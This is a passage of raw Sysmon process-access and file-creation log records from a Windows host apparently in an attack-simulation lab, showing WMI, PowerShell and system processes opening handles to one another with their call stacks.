RT4.dll+111bc 10341000x80000000000000002239016Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239015Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239014Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239013Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239012Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239011Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239010Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D98-603E-A2AA-00000000AD01}642411888C:\Windows\system32\conhost.exe{05ADC7E1-6D98-603E-A1AA-00000000AD01}9808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239009Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239008Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239007Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-9DAA-00000000AD01}9756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239006Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-9DAA-00000000AD01}9756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239005Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239004Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239003Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239002Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239001Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239000Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238999Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.775{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-A2AA-00000000AD01}6424C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 11241100x80000000000000002238998Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.775{05ADC7E1-6D98-603E-9FAA-00000000AD01}13544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_o0tylo1e.5rx.ps12021-03-02 16:53:44.775 10341000x80000000000000002238997Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.775{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-A1AA-00000000AD01}9808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238996Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.775{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238995Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.775{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238994Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.775{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238993Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.775{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238992Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.775{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-A1AA-00000000AD01}9808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238991Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 